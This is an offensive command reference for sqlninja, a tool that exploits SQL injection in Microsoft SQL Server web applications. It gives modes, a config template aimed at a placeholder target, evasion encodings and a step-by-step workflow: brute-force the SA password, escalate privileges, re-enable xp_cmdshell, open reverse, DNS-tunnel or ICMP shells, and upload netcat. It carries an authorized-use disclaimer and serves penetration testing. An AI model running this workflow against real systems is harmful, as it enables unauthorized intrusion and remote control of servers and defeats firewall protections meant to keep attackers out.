SQLNINJA
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
sqlninja exploits SQL injection vulnerabilities on web applications that use Microsoft SQL Server as a backend. It focuses on gaining a shell on the remote host rather than extracting data.
BASIC USAGE#
sqlninja -m <mode> # Run in specified mode sqlninja -f <config> # Use config file
MODES (-m)#
sqlninja -m test # Test injection and connection sqlninja -m fingerprint # Fingerprint remote SQL Server sqlninja -m bruteforce # Brute force SA password sqlninja -m escalation # Escalate privileges to SA sqlninja -m resurrectxp # Re-enable xp_cmdshell sqlninja -m upload # Upload executables sqlninja -m dirshell # Direct shell sqlninja -m backscan # Scan for open outbound ports sqlninja -m revshell # Reverse shell sqlninja -m dnstunnel # DNS tunnel shell sqlninja -m icmpshell # ICMP tunnel shell sqlninja -m metasploit # Metasploit payload injection sqlninja -m sqlcmd # Execute SQL commands
CONFIGURATION FILE#
# Default: sqlninja.conf # Required settings: --httprequest_start-- POST /vulnerable.asp HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: __CONTENT_LEN__ param1=value1&injectable_param=__SQL2INJECT__ --httprequest_end-- # Connection settings: host = target.com port = 80 ssl = no method = POST # SQL injection settings: evasion = 1 xp_name = xp_cmdshell
EVASION TECHNIQUES#
# 0 = No evasion # 1 = Use CHAR() instead of quotes # 2 = Random case # 3 = Random comments (/**/) # 4 = Hex encoding
WORKFLOW#
# 1. Configure sqlninja.conf with injection point sqlninja -m test # 2. Fingerprint the SQL Server sqlninja -m fingerprint # 3. Check outbound connectivity sqlninja -m backscan # 4. Escalate to SA (if needed) sqlninja -m escalation # or sqlninja -m bruteforce # 5. Enable xp_cmdshell sqlninja -m resurrectxp # 6. Get a shell sqlninja -m revshell # or sqlninja -m dirshell # 7. Upload tools sqlninja -m upload
EXAMPLES#
# Test injection point sqlninja -m test -f sqlninja.conf # Fingerprint SQL Server version sqlninja -m fingerprint -f sqlninja.conf # Brute force SA password sqlninja -m bruteforce -f sqlninja.conf -w passwords.txt # Get reverse shell sqlninja -m revshell -f sqlninja.conf # Upload netcat to target sqlninja -m upload -f sqlninja.conf # DNS tunnel (bypasses firewalls) sqlninja -m dnstunnel -f sqlninja.conf # Metasploit integration sqlninja -m metasploit -f sqlninja.conf
SHELL TYPES#
# Direct Shell: # - Binds a shell on the SQL Server # - Requires inbound port access # Reverse Shell: # - Target connects back to attacker # - Better for firewall bypass # DNS Tunnel: # - Tunnels shell over DNS queries # - Works when only DNS traffic is allowed # ICMP Shell: # - Tunnels shell over ICMP # - Bypasses TCP/UDP firewalls
NOTES#
- Perl-based tool - Specifically targets Microsoft SQL Server - Config file must be customized per target - Requires existing SQL injection vulnerability - Focus is on shells, not data extraction - Use sqlmap for data extraction - Supports Metasploit payload delivery - DNS tunnel useful for restricted environments - Only for authorized penetration testing